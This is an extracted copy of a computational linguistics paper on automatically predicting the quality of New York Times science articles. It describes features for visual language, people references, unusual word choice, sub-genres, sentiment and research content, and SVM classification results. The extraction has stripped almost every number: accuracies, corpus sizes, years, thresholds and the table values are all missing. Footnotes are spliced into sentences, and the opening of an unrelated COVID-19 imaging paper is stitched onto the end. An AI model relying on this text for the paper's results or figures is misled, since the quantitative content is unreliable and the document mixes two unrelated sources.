the same time. consider the following opening of a article by david quammen from harper’s magazine: one morning early last winter a small item appeared in my local newspaper announcing the birth of an extraordi- nary animal. a team of researchers at texas a&m uni- versity had succeeded in cloning a whitetail deer. never done before. the fawn, known as dewey, was developing normally and seemed to be healthy. he had no mother, just a surrogate who had carried his fetus to term. he had no father, just a “donor” of all his chromosomes. he was the genetic duplicate of a certain trophy buck out of south texas whose skin cells had been cultured in a laboratory. one of those cells furnished a nucleus that, transplanted and rejiggered, became the dna core of an egg cell, which became an embryo, which in time be- came dewey. so he was wildlife, in a sense, and in an- other sense elaborately synthetic. this is the sort of news, quirky but epochal, that can cause a person with a mouth- ful of toast to pause and marvel. what a dumb idea, i marveled. the writing is clear and well-organized but the text also contains creative use of language and a clever story-like explanation of the scientific con- tribution. such properties make science journalism an attractive genre for studying writing quality. sci- ence journalism is also a highly relevant domain for information retrieval in the context of educational as well as entertaining applications. article quality measures can hugely benefit such systems. prior work indicates that three aspects of article quality can be successfully predicted: a) whether a text meets the acceptable standards for spelling (brill and moore, ), grammar (tetreault and chodorow, ; rozovskaya and roth, ) and discourse organization (barzilay et al., ; lap- ata, ); b) has a topic that is interesting to a par- ticular user. for example, content-based recommen- dation systems standardly represent user interest us- ing frequent words from articles in a user’s history and retrieve other articles on the same topics (paz- transactions of the association for computational linguistics, ( ) – . action editor: mirella lapata. submitted / ; revised / , / ; published / . c© association for computational linguistics. zani et al., ; mooney and roy, ); and c) is easy to read for a target readership. shorter words (flesch, ), less complex syntax (schwarm and ostendorf, ) and high cohesion between sen- tences (graesser et al., ) typically indicate eas- ier and more ‘readable’ articles. less understood is the question of what makes an article interesting and beautifully written. an early and influential work on readability (flesch, ) also computed an interest measure with the hypoth- esis that interesting articles would be easier to read. more recently, mcintyre and lapata ( ) found that people’s ratings of interest for fairy tales can be successfully predicted using token-level scores re- lated to syntactic items and categories from a psy- cholinguistic database. but large scale studies of in- terest measures for adult educated readers have not been carried out. further, there have been little attempts to measure article quality in a genre-specific setting. but it is reasonable to expect that properties related to the unique aspects of a genre should contribute to the prediction of quality in the same way that domain- specific spelling and grammar correction (cucerzan and brill, ; bao et al., ; dale and kilgar- riff, ) techniques have been successful. here we address the above two issues by develop- ing measures related to interesting and well-written nature specifically for science journalism. central to our work is a corpus of science news articles with two categories: written by popular journalists and typical articles in science columns (section ). we introduce a set of genre-specific features related to beautiful writing, visual nature and affective content (section ) and show that they have high predictive accuracies, % above the baseline, for distinguish- ing our quality categories (section ). our final sys- tem combines the measures for interest and genre- specific features with those proposed for identifying readable, well-written and topically interesting arti- cles, giving an accuracy of % (section ). article quality corpus our corpus contains chosen articles from the larger new york times (nyt) corpus (sandhaus, ), the latter containing a wealth of metadata about each available from http://www.cis.upenn.edu/ ˜nlp/corpora/scinewscorpus.html article including author information and manually assigned topic tags. . general corpus the articles in the very good category include all contributions to the nyt by authors whose writing appeared in “the best american science writing” anthology published annually since . articles from the science columns of leading newspapers are nominated and expert journalists choose a set they consider exceptional to appear in these anthologies. there are nyt articles in the anthology (between years and ) that are also part of the digital nyt corpus; these articles form the seed set of the very good category. we further include in the very good category all other science articles contributed to nyt by the authors of the seed examples. science articles by other authors not in our seed set form the typical category. we perform this expansion by first creat- ing a relevant set of science articles. there is no single meta-data tag in the nyt which refers to all the science articles. so we use the topic tags from the seed articles as an initial set of research tags. we then compute the minimal set of research tags that cover all best articles. we greedily add tags into the minimal set, at each iteration choosing the tag that is present in the majority of articles that re- main uncovered. this minimal set contains tags such as ‘medicine and health’, ‘space’, ‘research’, ‘physics’ and ‘evolution’. we collect articles from the nyt which have at least one of the minimal set tags. however, even a cursory mention of a research topic results in a research-related tag being assigned to the article. so we also use a dictionary of research-related terms to determine whether the article passes a minimum threshold for research content. we created this dic- tionary manually and it contains the following words and their morphological variants (total items). we used our intuition about a few categories of re- search words to create this list. the category is shown in capital letters below. people: researcher, scientist, physicist, biologist, economist, anthropologist, environmentalist, linguist, professor, dr, student process: discover, found, experiment, work, finding, study, question, project, discuss topic: biology, physics, chemistry, anthropology, primatology publications: report, published, journal, paper, author, issue other: human, science, research, knowledge, university, lab- oratory, lab endings: -ology -gist, -list, -mist, -uist, -phy the items in the endings category are used to match word suffixes. an article is considered science-related if at least of its tokens match the dictionary and in addition, at least unique words from the dictionary are matched. since the time span of the best articles is to , we limit our col- lection to this timespan. in addition, we only con- sider articles that are at least words long. this filtered set of , articles form the relevant set of science journalism. the seed samples of great writing were con- tributed by about authors. some authors have multiple articles selected for the best writing book series, supporting the idea that these authors produce high quality pieces that can be considered distinct from typical articles. separating the articles from these authors gives us , extra samples of very good writing. in total, the very good set has , articles. the remaining articles from the rele- vant set, , , written by about other authors form the typical category. . topic-paired corpus the general corpus of science writing introduced so far contains articles on diverse topics including bi- ology, astronomy, religion and sports. the very good and typical categories created above al- low us to study writing quality without regard to topic. however a typical information retrieval sce- nario would involve comparison between articles of the same topic, i.e. relevant to the same query. to investigate how quality differentiation can be done within topics, we created another corpus where we paired articles of very good and typical quality. for each article in the very good category, we compute similarity with all articles in the typical set. this similarity is computed by comparing the topic words (computed using a loglikelihood ratio test (lin and hovy, )) of the two articles. we retain the most similar typical articles for each very good article. we enumerate all pairs of very good with matched up typical articles ( in number) giving a total of , pairs. there are two distinguishing aspects of our cor- pus. first, the average quality of articles is high. they are unlikely to have spelling, grammar and ba- sic organization problems allowing us to investigate article quality rather than the detection of errors. second, our corpus contains more realistic samples of quality differences for ir or article recommen- dation compared to prior work, where system pro- duced texts and permuted versions of an original ar- ticle were used as proxies for lower quality text. . tasks we perform two types of classification tasks. we divide our corpus into development and test sets for these tasks in the following way. any topic: here the goal is to separate out very good versus typical articles without regard to topic. the setting roughly corresponds to picking out an interesting article from an archive or a day’s newspaper. the test set contains , very good articles and we randomly sample , articles from the typical category to comprise the negative set. same topic: here we use the topic-paired very good and typical articles. the goal is to predict which article in the pair is the very good one. this task is closer to a information retrieval setting, where articles similar in topic (retrieved for a user query) need to be distinguished for quality. for test set, we selected , pairs. development data: we randomly selected very good articles and their paired ( each) typical articles from the topic-normalized corpus. overall, these constitute , pairs which we use for developing the same-topic classifier. from these selected pairs we take the very good articles and sample unique articles from the typical articles making up the pairs. these articles are used to tune the any-topic classifier. facets of science writing in this section, we discuss six prominent facets of science writing which we hypothesized will have an impact on text quality. these are the presence of passages of highly visual nature, people-oriented content, use of beautiful language, sub-genres, sen- timent or affect, and the depth of research descrip- tion. several other properties of science writing could also be relevant to quality such as the use of humor, metaphor, suspense and clarity of explana- tions and we plan to explore these in future work. we describe how we computed features related to each property and tested how these features are dis- tributed in the very good and typical categories. to do this analysis, we randomly sampled , ar- ticles from each of the two categories as representa- tive examples. we compute the value of each feature on these articles and use a two-sided t-test to check if the mean value of the feature is higher in one class of articles. a p-value less than . is taken to in- dicate significantly different trend for the feature in the very good versus typical articles. note that our feature computation step is not tuned for the quality prediction task in any way. rather we aim to represent each facet as accurately as possible. ideally we would require manual anno- tations for each facet (visual, sentiment nature etc.) to achieve this goal. at this time, we simply check some chosen features’ values on a random collection of snippets from our corpus and check if they behave as intended without resorting to these annotations. . visual nature of articles some texts create an image in the reader’s mind. for example, the snippet below has a high visual effect. when the sea lions approached close, seemingly as curious about us as we were about them, their big brown eyes were encircled by light fur that looked like makeup. one sea lion played with a conch shell as if it were a ball. such vivid descriptions can engage and entertain a reader. kosslyn ( ) found that people spon- taneously form images of concrete words that they hear and use them to answer questions or perform other tasks. books written for student science jour- nalists (blum et al., ; stocking, ) also em- phasize the importance of visual descriptions. we measure the visual nature of a text by count- ing the number of visual words. currently, the only resource of imagery ratings for words is the mrc psycholinguistic database (wilson, ). it con- tains a list of , words rated for their ability to invoke an image, so the list contains both words that are highly visual along with words that are not visual at all. with a cutoff value we adopted, of . for the gilhooly-logie and for the bristol norms we the visual words resource in mrc contains two lists— obtain , visual words. so the coverage of that lexicon is likely to be low for our corpus. we collect a larger set of visual words from a cor- pus of tagged images from the esp game (von ahn and dabbish, ). the corpus contains , total images and , unique tags. the average number of tags per picture is . . the tags were collected in a game setting where two users individ- ually saw the same image and had to guess words related to it. the players increased their scores when the word guessed by one player matched that of the other. due to the simple annotation method, there is considerable noise and non-visual words assigned as tags. so we performed filtering to find high pre- cision image words and also group them into topics. we use latent dirichlet allocation (blei et al., ) to cluster image tags into topics. we treat each picture as a document and the tags assigned to the picture are the document’s contents. we use sym- metric priors set to . for both topic mixture and word distribution within each topic. we filter out the most common words in the corpus, words that ap- pear in less than four pictures and images with fewer than five tags. the remaining words are clustered into topics with the stanford topic modeling toolbox (ramage et al., ). we did not tune the number of topics and choose the value of based on the intuition that the number of visual topics is likely to be small. to select clean visual clusters, we make the as- sumption that visual words are likely to be clustered with other visual terms. topics that are not visual are discarded altogether. we use the manual an- notations available with the mrc database to de- termine which clusters are visual. for each of the topics from the topic model, we examine the top words with highest probability in that topic. we compute the precision of each topic as the pro- portion of these words that match the mrc list of visual words ( , words using the cutoff men- tioned above). only those topics which had a pre- cision of at least % were retained, resulting in visual topics. some example topics, with manually created headings, include: landscape. grass, mountain, green, hill, blue, field, brown, sand, desert, dirt, landscape, sky gilhooly-logie and bristol norms. http://nlp.stanford.edu/software/tmt/tmt- . / jewellery. silver, white, diamond, gold, necklace, chain, ring, jewel, wedding, diamonds, jewelry shapes. round, ball, circles, logo, dots, square, dot, sphere, glass, hole, oval, circle combining these topics, there are , unique visual words because topics can overlap in the list of most probable words. , words from this set are not present in the mrc database. some examples of new words in our list are ‘daffodil’, ‘sailor’, ‘hel- met’, ‘postcard’, ‘sticker’, ‘carousel’, ‘kayak’, and ‘camouflage’. for later experiments we consider the , words as the visual word set and also keep the information about the top words in the selected topics. we compute two classes of features one based on all visual words and the other on visual topics. we consider only the adjectives, adverbs, verbs and common nouns in an article as candidate words for computing visual quality. overall visual use: we compute the propor- tion of candidate words that match the visual word list as the total visual feature. we also compute the proportions based only on the first words of the article (beg visual), the last words (end visual) and the middle region (mid visual) as features. we also divide the arti- cle into five equally sized bins of words where each bin captures consecutive words in the article. within each bin we compute the proportion of visual words. we treat these values as a probability distribution and compute its entropy (entropy visual). we expected these position features to indicate how the placement of visual words is related to quality. topic-based features: we also compute what pro- portion of the words we identify as visual matches the list under each topic. the maximum proportion from a single topic (max topic visual) is a fea- ture. we also compute a greedy cover set of top- ics for the visual words in the article. the topic that matches the most visual words is added first, and the next topic is selected based on the remain- ing unmatched words. the number of topics needed to cover % of the article’s visual words is the topic cover visual feature. these features cap- ture the mix of visual words from different topics. disregarding topic information, we also compute a feature num pictures which is the number of im- ages in the corpus where % of the image’s tags are matched in the article. we found features to vary significantly be- tween the two types of articles. the fea- tures with significantly higher values in very good articles are: beg visual, end visual, max topic visual. the features with signifi- cantly higher values in the typical articles are: total visual, mid visual, entropy visual, topic cover visual, num pictures. it appears that the simple expectation that very good articles contain more visual words overall does not hold true here. however the great writ- ing samples have a higher degree of visual content in the beginning and ends of articles. good articles also have lower entropy for the distribution of vi- sual words indicating that they appear in localized positions in contrast to being distributed throughout. the topic-based features further indicate that for the very good articles, the visual words come from only a few topics (compared to typical articles) and so may evoke a coherent image or scene. . the use of people in the story we hypothesized that articles containing research findings that directly affect people in some way, and therefore involve explicit references to people in the story, will make a bigger impact on the reader. for example, the most frequent topic among our very good samples is ‘medicine and health’ where ar- ticles are often written from the view of a patient, doctor or scientist. an example is below. dr. remington was born in reedville, va., in , to maud and p. sheldon remington, a school headmaster. charles spent his boyhood chasing butterflies alongside his father, also a col- lector. during his graduate studies at harvard, he founded the lepidopterists’ society with an equally butterfly-smitten under- graduate, harry clench. we approximate this facet by computing the num- ber of explicit references to people, relying on three sources of information about animacy of words. the first is named entity (ne) tags (person, organi- zation and location) returned by the stanford ne recognition tool (finkel et al., ). we also created a list of personal pronouns such as ‘he’, ‘my- self’ etc. which standardly indicate animate entities (animate pronouns). our third resource contains the number of times different noun phrases (np) were followed by each of the relative pronouns ‘who’, ‘where’ and ‘which’. these counts for , noun phrases were col- lected by ji and lin ( ) from the google ngram corpus (lin et al., ). we use a simple heuris- tic to obtain a list of animate (google animate) and inanimate nouns (google inanimate) from this list. the head of each np is taken as a candidate noun. if the noun does not occur with ‘who’ in any of the noun phrases where it is the head, then it is inani- mate. in contrast, if it appears only with ‘who’ in all noun phrases, it is animate. otherwise, for each np where the noun is a head, we check whether the count of times the noun phrase appeared with ‘who’ is greater than each of the occurrences of ‘which’, ‘where’ and ‘when’ (taken individually) with that noun phrase. if the condition holds for at least one noun phrase, the noun is marked as animate. when computing the features for an article, we consider all nouns and pronouns as candidate words. if the word is a pronoun and appears in our list of an- imate pronouns, it is assigned an ‘animate’ label and ‘inanimate’ otherwise. if the word is a proper noun and tagged with the person ne tag, we mark it as ‘animate’ and if it is a organization or lo- cation tag, the word is ‘inanimate’. for common nouns, we check it if appears in the google animate and inanimate lists. any match is labelled accord- ingly as ‘animate’ and ‘inanimate’. note that this procedure may leave some nouns without any labels. our features are counts of animate tokens (anim), inanimate tokens (inamin) and both these counts normalized by total words in the article (anim prop, inanim prop). three of these fea- tures had significantly higher mean values in the typical category of articles: anim, anim prop, inanim prop. we found upon observation that sev- eral articles that talk about government policies in- volve a lot of references to people but are often in the typical category. these findings suggest that the ‘human’ dimension might need to be computed not only based on simple counts of references to people but also involve finer distinctions between them. . beautiful language beautiful phrasing and word choice can entertain the reader and leave a positive impression. multi- ple studies in the education genre (diederich, ; spandel, ) note that when teachers and expert adult readers graded student writing, word choice and phrasing always turn out as a significant factors influencing the raters’ scores. we implement a method for detecting creative language based on a simple idea that creative words and phrases are sometimes those that are used in un- usual contexts and combinations or those that sound unusual. we compute measures of unusual language both at the level of individual words and for the com- bination of words in a syntactic relation. word level measures: unusual words in an ar- ticle are likely to be those with low frequencies in a background corpus. we use the full set of articles (not only science) from year in the nyt corpus as a background (these do not over- lap with our corpus for article quality). we also ex- plore patterns of letters and phoneme sequences with the idea that unusual combination of characters and phonemes could create interesting words. we used the cmu pronunciation dictionary (weide, ) to get the phoneme information for words and built a - gram model of phonemes on the background corpus. laplace smoothing is used to compute probabilities from the model. however, the cmu dictionary does not contain phoneme information for several words in our corpus. so we also compute an approximate model using the letters in the words and obtain an- other -gram model. only words that are longer than characters are used in both models and we fil- ter out proper names, named entities and numbers. during development, we analyzed the articles from an entire year of nyt, , with the three models to identify unusual words. below is the list of words with lowest frequency and those with high- est perplexity under the phoneme and letter models. low frequency. undersheriff, woggle, ahmok, hofman, volga, oceanaut, trachoma, baneful, truffler, acrimal, corvair, entomopter high perplexity-phoneme model. showroom, yahoo, dossier, powwow, plowshare, oomph, chihuahua, iono- sphere, boudoir, superb, zaire, oeuvre high perplexity-letter model. kudzu, muumuu, qi- pao, yugoslav, kohlrabi, iraqi, yaqui, yakuza, jujitsu, oeu- vre, yaohan, kaffiyeh for computing the features, we consider only nouns, verbs, adjectives and adverbs. we also require that the words are at least letters long we found that higher order n-grams provided better pre- dictions of unusual nature during development. and do not contain a hyphen . three types of scores are computed. freq nyt is the aver- age of word frequencies computed from the back- ground corpus. the second set of features are based on the phoneme model. we compute the average perplexity of words under the model, avr phoneme perp all. in addition, we also or- der the words in an article based on decreasing per- plexity values and the average perplexity of the top , and words in this list are added as fea- tures (avr phoneme perp , , ). we ob- tain similar features from the letter n-gram model (avr char perp all, avr char perp , , ). in phoneme features, we ignore words that do not have an entry in the cmu dictionary. word pair measures: next we attempt to detect un- usual combinations of words. we do this calculation only for certain types of syntactic relations–a) nouns and their adjective modifiers, b) verbs with adverb modifiers, c) adjacent nouns in a noun phrase and d) verb and subject pairs. counts for co-occurrence again come from nyt articles. the syntactic relations are obtained using the constituency and de- pendency parses from the stanford parser (klein and manning, ; de marneffe et al., ). to avoid the influence of proper names and named entities, we replace them with tags (nnp for proper names and person, org, loc for named entities). we treat the words for which the dependency holds as a (auxiliary word, main word) pair. for adjective-noun and adverb-verb pairs, the auxiliary is the adjective or adverb; for noun-noun pairs, it is the first noun; and for verb-subject pairs, the auxil- iary is the subject. our idea is to compute usualness scores based on frequency with which a particular pair of words appears in the background. specifically, we compute the conditional proba- bility of the auxiliary word given the main word as the score for likelihood of observing the pair. we consider the main word as related to the article topic, so we use the conditional probability of auxil- iary given main word and not the other way around. however, the conditional probability has no infor- mation about the frequency of the auxiliary word. so we apply ideas from interpolation smoothing (chen we noticed that in this genre several new words are created using hyphen to concatenate common words. adj-noun adv-verb hypoactive nnp suburbs said plasticky woman integral was psychogenic problems collective do yoplait television physiologically do subminimal level amuck run ehatchery investment illegitimately put noun-noun subj-verb specification today blog said auditory system briefer said pal programs hr said steganography programs knucklehead said wastewater system lymphedema have autism conference permissions have table : unusual word-pairs from different categories and goodman, ) and compute the conditional probability as a interpolated quantity together with the unigram probability of the auxiliary word. p̂(aux|main) = λ∗p(aux|main)+( −λ)∗p(aux) the unigram and conditional probabilities are also smoothed using laplace method. we train the lambda values to optimize data likelihood using the baum welch algorithm and use the pairs from nyt year articles as a development set. the lambda values across all types of pairs tended to be lower than . giving higher weight to the unigram proba- bility of the auxiliary word. based on our observations on the development set, we picked a cutoff of . on the proba- bility ( . for adverb-verb pairs) and consider phrases with probability below this value as un- usual. for each test article, we compute the num- ber of unusual phrases (total for all categories) as a feature (surp) and also this value normal- ized by total number of word tokens in the article (surp wd) and normalized by number of phrases (surp ph). we also compute features for indi- vidual pair types and in each case, the number of unusual phrases is normalized by the total words in the article (surp adj noun, surp adv verb, surp noun noun, surp subj verb). a list of the top unusual words under the different pair types are shown in table . these were com- puted on pairs from a random set of articles from our corpus. several of the top pairs involve hyphenated words which are unusual by themselves, so we only show in the table the top words without hyphens. most of these features are significantly different between the two classes. those with higher values in the very good set include: avr phoneme perp all, avr char perp (all, ), surp, surp ph, surp wd, surp adj noun, surp noun noun, surp subj verb. the freq nyt feature has higher value in the typical class. all these trends indicate that unusual phrases are associated with the very good category of articles. . sub-genres there are several sub-genres within science writing (stocking, ): short descriptions of discoveries, longer explanatory articles, narratives, stories about scientists, reports on meetings, review articles and blog posts. naturally, some of these sub-genres will be more appealing to readers. to investigate this aspect, we compute scores for some sub-genres of interest—narrative, attribution and interview. narrative texts typically have characters and events (nakhimovsky, ), so we look for entities and past tense in the articles. we count the number of sentences where the first verb in surface order is in the past tense. then among these sentences, we pick those which have either a personal pronoun or a proper noun before the target verb (again in surface order). the proportion of such sentences in the text is taken as the narrative score. we also developed a measure to identify the de- gree to which the article’s content is attributed to ex- ternal sources as opposed to the author’s own state- ments. attribution to other sources is frequent in the news domain since many comments and opin- ions are not the views of the journalist (semetko and valkenburg, ). for science news, attribution be- comes more important since the research findings were obtained by scientists and reported in a second- hand manner by the journalists. the attrib score is the proportion of sentences in the article that have a quote symbol, or the words ‘said’ and ‘says’. we also compute a score to indicate if the article is the account of an interview. there are easy clues in nyt for this genre with paragraphs in the inter- view portion of the article beginning with either ‘q.’ (question) or ‘a.’ (answer). we count the total num- ber of ‘q.’ and ‘a.’ prefixes combined and divide the value by the total number of sentences (inter- view). when either the number of ‘q.’ tags is zero or ‘a.’ tags is zero, the score is set to zero. all three scores are significantly higher for the typical class. . affective content some articles, for example those detailing research on health, crime, ethics, can provoke emotional re- actions in readers as shown in the snippet below. medicine is a constant trade-off, a struggle to cure the dis- ease without killing the patient first. chemotherapy, for exam- ple, involves purposely poisoning someone – but with the ex- pectation that the short-term injury will be outweighed by the eventual benefits. we compute affect-related features using three lexicons. the mpqa (wilson et al., ) and gen- eral inquirer (stone et al., ) give lists of positive and negative sentiment words. the third resource is emotion-related words from framenet (baker et al., ). the sizes of these lexicon are , , , , and words respectively. we compute the counts of positive, negative, polar, and emotion words, each normalized by the total number of con- tent words in the article (pos prop, neg prop, po- lar prop, emot prop). we also include the pro- portion of emotion and polar words taken together (polar emot prop) and the ratio between count of positive and negative words (pos by neg). the features with higher values in the very good class are neg prop, polar prop, emot polar prop. in typical articles, pos by neg, emot prop have higher values. very good articles have more sentiment words, mostly skewed towards negative sentiment. . amount of research content for a lay audience, a science writer presents only the most relevant findings and methods from a research study and interleaves research information with de- tails about the relevance of the finding, people in- volved in the research and general information about the topic. as a result, the degree of explicit research descriptions in the articles varies considerably. to test how this aspect is associated with qual- ity, we count references to research methods and re- searchers in the article. we use the research dictio- nary that we introduced in section as the source of research-related words. we count the total num- ber of words in the article that match the dictionary (res total) and also the number of unique match- ing words (res uniq). we also normalize these counts by the total words in the article and create features res total prop and res uniq prop. all four features have significantly higher values in the very good articles which indicate that great articles are also associated with a great amount of direct research content and explanations. classification accuracy we trained classifiers using all the above features for for the two settings–‘any-topic’ and ‘same-topic’ in- troduced in section . . the baseline random accu- racy in both cases is %. we use a svm classi- fier with a radial basis kernel (r development core team, ) and parameters were tuned using cross validation on the development data. the best parameters were then used to classify the test set in a fold cross-validation setting. we di- vide the test set into parts, train on parts and test on the held-out data. the average accuracies in the experiments are . % accuracy for the ‘any- topic’ setup, and % accuracy for the topic-paired ‘same-topic’ setup. these accuracies are consider- able improvements over the baseline. the ‘same-topic’ data contains article pairs with varying similarity. so we investigate the relationship between topic similarity and accuracy of prediction more closely for this setting. we divide the article pairs into bins based on the similarity value. we compute the -fold cross validation predictions us- ing the different feature classes above and collect the predicted values across all the folds. then we com- pute accuracy of examples within each bin. these results are plotted in figure . int-science refers to the full set of features and the results from the six feature classes are also indicated. as the similarity increases, the prediction task be- comes harder. the combination of all features gives % accuracy for pairs above . similarity and % when the similarity is less than . . most individ- ual feature classes also show a similar trend. this result is understandable because articles on simi- lar topics could exhibit similar properties. for ex- ample, two articles about ‘controversies surround- ing vaccination’ are likely to have similar levels of people-oriented nature or written in a narrative style figure : accuracy on pairs with different similarity in the same way as two space-related articles are both likely to contain high visual content. there are however two exceptions—affect and research. for these features, the accuracies improve with higher similarity; affect features give % for pairs with similarity . and % for pairs above . similar- ity, accuracy of research features goes from % to % for the same similarity values. this finding il- lustrates that even articles on very similar topics can be written differently, with the articles by the excel- lent authors associated with greater degree of senti- ment, and deeper study of the research problem. combining aspects of article quality we now compare and combine the genre-specific interest-science features ( total) with those dis- cussed in work on readability, well-written nature, interest and topic classification. readability ( features): we test the full set of readability features studied in pitler and nenkova ( ), involving token-type ratio, word and sen- tence length, language model features, cohesion scores and syntactic estimates of complexity. well-written nature ( features): for well- written nature, we use two classes of features, both related to discourse. one is the probabilities of dif- ferent types of entity transitions from the entity grid model (barzilay and lapata, ) which we com- pute with the brown coherence toolkit (elsner et al., ). the other class of features are those de- fined in pitler and nenkova ( ) for likelihoods and counts of explicit discourse relations. we iden- tified the relations for texts in our corpus using the adddiscourse tool (pitler and nenkova, ). interesting fiction ( features): are those intro- duced by mcintyre and lapata ( ) for predicting interest ratings on fairy tales. they include counts of syntactic items and relations, and token categories from the mrc psycholinguistic database. we nor- malize each feature by the total words in the article. content: features are based on the words present in the articles. word features are standard in content-based recommendation systems (pazzani et al., ; mooney and roy, ) where they are used to pick out articles similar to those which a user has already read. in our work the features are the most frequent n words in our corpus after removing the most frequent ones. the word’s count in the article is the feature value. note that word features indicate topic as well as other content in the article such as sentiment and research. a random sample of the word features for n = is shown below and reflects this aspect. “matter, series, wear, nation, ac- count, surgery, high, receive, remember, support, worry, enough, office, prevent, biggest, customer”. table compares the accuracies of svm classi- fiers trained on features from different classes and their combinations. the readability, well-written nature and interesting fiction classes provide good accuracies % and above. the genre-specific interesting-science features are individually much stronger than these classes. different writing as- pects (without content) are clearly complementary and when combined give % to % accuracy for the ‘any-topic’ task and % for the topic pairs task. the simple bag of words features work remark- ably well giving % accuracy in both settings. as mentioned before these word features are a mix of topic indicators as well as other content of the ar- ticles, ie., they also implicitly indicate animacy, re- search or sentiment. but the high accuracy of word features above all the writing categories indicates that topic plays an important role in article quality. however, despite the high accuracy, word features are not easily interpretable in different classes re- lated to writing as we have done with other writing features. further, the total set of writing features is for classifiers involving content features, we did not tune the svm parameters because of the small size of development data compared to number of features. default svm settings were used instead. feature set any topic same interesting-science . . readable . . well-written . . interesting-fiction . . readable + well-writ . . readable + well-writ + int-fict . . readable + well-writ + int-sci . . all writing aspects . . content ( words) . . content ( words) . . combination: writing (all) + content ( w) in feature vector . * . * sum of confidence scores . . oracle . . table : accuracy of different article quality aspects only in contrast to word features. in our interest-science feature set, we aimed to highlight how well some of the aspects considered important to good science writing can predict quality ratings. we also combined writing and word features to mix topic with writing related predictors. we do the combination in three ways a) word and writing fea- tures are included together in the feature vector; b) two separate classifiers are trained (one using word features and the other using writing ones) and the sum of confidence measures is used to decide on the final class; c) an oracle method: two classifiers are trained just as in option (b) but when they disagree on the class, we pick the correct label. the oracle method gives a simple upper bound on the accuracy obtainable by combination. these values are % for ‘any-topic’ and a higher . % for ‘same-topic’. the automatic methods, both feature vector combi- nation and classifier combination also give better ac- curacies than only the word or writing features. the accuracies for the folds from fold cross valida- tion in the feature vector combination method were also found to be significantly higher than those from word features only (using a paired wilcoxon signed- rank test). therefore both topic and writing features are clearly useful for identifying great articles. conclusion our work is a step towards measuring overall arti- cle quality by showing the complementary benefits of general and domain-specific writing measures as well as indicators of article topic. in future we plan to focus on development of more features as well as better methods for combining different measures. references c. f. baker, c. j. fillmore, and j. b. lowe. . the berkeley framenet project. in proceedings of coling-acl, pages – . z. bao, b. kimelfeld, and y. li. . a graph ap- proach to spelling correction in domain-centric search. in proceedings of acl-hlt, pages – . r. barzilay and m. lapata. . modeling local coher- ence: an entity-based approach. computational lin- guistics, ( ): – . r. barzilay, n. elhadad, and k. mckeown. . inferring strategies for sentence ordering in multi- document summar ization. journal of artificial intel- ligence research, : – . d.m. blei, a.y. ng, and m.i. jordan. . latent dirichlet allocation. the journal of machine learning research, : – . d. blum, m. knudson, and r. m. henig, editors. . a field guide for science writers: the official guide of the national association of science writers. oxford university press, new york. e. brill and r.c. moore. . an improved error model for noisy channel spelling correction. in proceedings of acl, pages – . s. f. chen and j. goodman. . an empirical study of smoothing techniques for language modeling. in proceedings of acl, pages – . s. cucerzan and e. brill. . spelling correction as an iterative process that exploits the collective knowledge of web users. in proceedings of emnlp, pages – . r. dale and a. kilgarriff. . helping our own: text massaging for computational linguistics as a new shared task. in proceedings of inlg, pages – . m. c. de marneffe, b. maccartney, and c. d. man- ning. . generating typed dependency parses from phrase structure parses. in proceedings of lrec, vol- ume , pages – . p. diederich. . measuring growth in english. na- tional council of teachers of english. m. elsner, j. austerweil, and e. charniak. . a uni- fied local and global model for discourse coherence. in proceedings of naacl-hlt, pages – . j. r. finkel, t. grenager, and c. manning. . in- corporating non-local information into information ex- traction systems by gibbs sampling. in proceedings of acl, pages – . r. flesch. . a new readability yardstick. journal of applied psychology, : – . a.c. graesser, d.s. mcnamara, m.m. louwerse, and z. cai. . coh-metrix: analysis of text on co- hesion and language. behavior research methods in- struments and computers, ( ): – . h. ji and d. lin. . gender and animacy knowledge discovery from web-scale n-grams for unsupervised person name detection. in proceedings of paclic. d. klein and c.d. manning. . accurate unlexical- ized parsing. in proceedings of acl, pages – . s.m. kosslyn. . image and mind. harvard univer- sity press. m. lapata. . probabilistic text structuring: experi- ments with sentence ordering. in proceedings of acl, pages – . c. lin and e. hovy. . the automated acquisition of topic signatures for text summarization. in proceed- ings of coling, pages – . d. lin, k. w. church, h. ji, s. sekine, d. yarowsky, s. bergsma, k. patil, e. pitler, r. lathbury, v. rao, k. dalwani, and s. narsale. . new tools for web- scale n-grams. in proceedings of lrec. n. mcintyre and m. lapata. . learning to tell tales: a data-driven approach to story generation. in pro- ceedings of acl-ijcnlp, pages – . r. j. mooney and l. roy. . content-based book recommending using learning for text categorization. in proceedings of the fifth acm conference on digital libraries, pages – . a. nakhimovsky. . aspect, aspectual class, and the temporal structure of narrative. computational lin- guistics, ( ): – , june. m. pazzani, j. muramatsu, and d. billsus. . syskill & webert: identifying interesting web sites. in pro- ceedings of aaai, pages – . e. pitler and a. nenkova. . revisiting readabil- ity: a unified framework for predicting text quality. in proceedings of emnlp, pages – . e. pitler and a. nenkova. . using syntax to dis- ambiguate explicit discourse connectives in text. in proceedings of acl-ijcnlp, pages – . r development core team, . r: a language and environment for statistical computing. r foundation for statistical computing. d. ramage, d. hall, r. nallapati, and c.d. manning. . labeled lda: a supervised topic model for credit attribution in multi-labeled corpora. in proceed- ings of emnlp, pages – . a. rozovskaya and d. roth. . generating confu- sion sets for context-sensitive error correction. in pro- ceedings of emnlp, pages – . e. sandhaus. . the new york times annotated cor- pus. corpus number ldc t , linguistic data consortium, philadelphia. s. schwarm and m. ostendorf. . reading level as- sessment using support vector machines and statistical language models. in proceedings of acl, pages – . h.a. semetko and p.m. valkenburg. . framing eu- ropean politics: a content analysis of press and televi- sion news. journal of communication, ( ): – . v. spandel. . creating writers through -trait writing: assessment and instruction. allyn and ba- con, inc. s. h. stocking. . the new york times reader: sci- ence and technology. cq press, washington dc. p. j. stone, j. kirsh, and cambridge computer asso- ciates. . the general inquirer: a computer ap- proach to content analysis. mit press. j. r. tetreault and m. chodorow. . the ups and downs of preposition error detection in esl writing. in proceedings of coling, pages – . l. von ahn and l. dabbish. . labeling images with a computer game. in proceedings of chi, pages – . r. l. weide. . the cmu pronunciation dictio- nary, release . . http://www.speech.cs.cmu.edu/cgi- bin/cmudict. t. wilson, j. wiebe, and p. hoffmann. . recogniz- ing contextual polarity in phrase-level sentiment anal- ysis. in proceedings of hlt-emnlp, pages – . m. wilson. . mrc psycholinguistic database: machine-usable dictionary, version . . behavior research methods, ( ): – . a multi-task pipeline with specialized streams for classification and segmentation of infection manifestations in covid- scans a multi-task pipeline with specialized streams for classification and segmentation of infection manifestations in covid- scans shimaa el-bana , ahmad al-kabbany , , and maha sharkas alexandria higher institute of engineering and technology, alexandria, egypt intelligent systems lab, arab academy for science, technology, and maritime transport, alexandria, egypt department of research and development, vrapeutic, cairo, 